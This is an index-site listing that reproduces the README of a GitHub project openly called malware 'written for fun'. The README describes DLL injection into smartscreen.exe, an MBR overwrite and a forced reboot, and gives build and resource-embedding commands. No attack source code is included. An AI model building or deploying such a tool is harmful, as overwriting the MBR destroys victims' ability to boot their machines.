An open API service indexing awesome lists of open source software.

https://github.com/aniko33/catch-me

A simple malware written for fun
https://github.com/aniko33/catch-me

Last synced: about 2 months ago
JSON representation

A simple malware written for fun

Awesome Lists containing this project

README

        

# Catch me!

---

This malware will do a process injection on *smartscreen.exe* by injecting the `essential` DLL which will display a MessageBox saying *"TRY KILL ME"*.
As soon as the **injected process is killed or after letting *25 seconds* pass it**
will **overwrite your MBR and then do a reboot**; all this with music playing in the background and the wallpaper changed

## Compile
`make all`

## Add custom resources
song: `xxd -n song_wav -i .wav > include/resource/song.c`

wallpaper (does not have to be jpg): `xxd -n wallpaper_jpg -i > include/resource/wallpaper.c`

mbr: `nasm mbr.asm -o mbr.bin && xxd -n mbr_asm -i mbr.bin > include/resource/mbr.c && rm mbr.bin`